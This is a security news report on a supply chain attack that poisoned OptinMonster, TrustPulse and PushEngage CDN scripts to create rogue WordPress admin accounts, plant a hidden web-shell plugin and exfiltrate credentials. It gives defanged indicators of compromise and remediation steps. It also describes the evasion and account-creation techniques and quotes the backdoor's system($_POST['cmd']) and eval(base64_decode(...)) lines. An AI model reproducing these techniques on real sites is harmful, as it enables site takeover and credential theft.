A sophisticated supply chain attack targeting the widely used OptinMonster WordPress plugin has compromised more than 1.2 million WordPress websites, security researchers at Sansec confirmed this week.
The campaign, which also swept up users of the TrustPulse and PushEngage plugins, delivered malicious JavaScript through legitimate CDN-served files meaning individual sites were infected without ever being directly targeted.
The operation mirrors the notorious 2024 Polyfill supply chain incident in both method and scale. Instead of attacking individual WordPress installations, threat actors tampered with upstream SDK files hosted on Awesome Motive-controlled BunnyNet CDN endpoints.
OptinMonster Supply Chain Attack
Any site loading scripts from domains including a.omappapi[.]com, a.opmnstr[.]com, a.trstplse[.]com, and clientcdn.pushengage[.]com automatically pulled the poisoned payload directly from the source.
Awesome Motive later confirmed the root cause: an attacker exploited a known vulnerability in the UpdraftPlus plugin on the company’s internal marketing server, discovered a CDN API key stored on that server, and used it to modify the SDK files delivered to customers globally.
The injected JavaScript is highly evasive. It immediately exits on headless browsers or WebDriver environments and only activates upon detecting a logged-in WordPress administrator identified through the wp-admin path, admin bar presence, or wordpress_logged_in_ cookie. A 24-hour localStorage throttle stored under _pe_ts prevents repeated execution within the same session.
Once an active admin session is confirmed, the payload executes in stages:
- Harvests REST and AJAX nonces from the active session
- Creates a rogue administrator account under the fixed username
developer_api1alongside randomizeddev_xxxxxxaccounts - Attempts account creation through four sequential fallback methods:
user-new.php,admin-ajax.php, thewp/v2/usersREST endpoint, and a hidden iframe form submission - Recognizes “user already exists” error responses in approximately 20 languages to avoid detection
Following successful account creation, the payload silently uploads a self-hiding PHP backdoor plugin. Stolen credentials, site origin, admin path, and WordPress version are exfiltrated XOR-encrypted using the key jX9kM2nP4qR6sT8v to the C2 domain tidio[.]cc.
The installed backdoor is engineered for complete stealth. It hides itself from the WordPress admin plugin list, REST API endpoints, update checks, and the recently active plugins list. It exposes two unauthenticated entry points: a web shell branded “WPM File Manager & Shell” that executes system($_POST['cmd']) and accepts arbitrary file uploads, and a secondary endpoint running eval(base64_decode(...)) on attacker-supplied input.
The plugin has been observed disguised as “Content Delivery Helper” (v2.7.1) and more recently as “Database Optimizer” (v2.9.4).
Researchers confirmed active exploitation, blocking 271 rogue account creation attempts across 13 sites on June 14–15. Of those, 263 targeted the wp/v2/users REST endpoint, with the remainder split across user-new.php and admin-ajax.php. Attempts originated from 81 unique IP addresses.
Indicators of Compromise (IOCs)
| Category | Indicator | Details |
|---|---|---|
| C2 Domain | tidio[.]cc | IP: 84.201.6[.]54 · AS214036 · Cert registered 2026-04-28 |
| C2 Endpoint | tidio[.]cc/cdn-cgi/p | Exfil — OptinMonster/TrustPulse |
| C2 Endpoint | tidio[.]cc/cdn-cgi/b | Exfil — OptinMonster/TrustPulse |
| C2 Endpoint | tidio[.]cc/cdn-cgi/pe-p | Exfil — PushEngage variant |
| C2 Endpoint | tidio[.]cc/cdn-cgi/pe-l | Payload generation — PushEngage |
| XOR Key | jX9kM2nP4qR6sT8v | Malware encryption key |
| Rogue Account | developer_api1 | Fixed operator account |
| Rogue Account | dev_xxxxxx | Pattern-based randomized accounts |
| Backdoor Plugin | content-delivery-helper | “Content Delivery Helper” v2.7.1 |
| Backdoor Plugin | database-optimizer | “Database Optimizer” v2.9.4 |
Note: All domains and IPs above are intentionally defanged. Re-fang only within controlled TI platforms such as MISP, VirusTotal, or your SIEM.
Affected site owners should immediately audit user accounts and inspect the wp-content/plugins directory on disk not solely through the admin UI, as the backdoor actively conceals itself from the dashboard.
If any IOCs are found, rotate all admin passwords and WordPress secret keys immediately and assume unauthenticated code execution has already occurred on the affected host.
No Comment! Be the first one.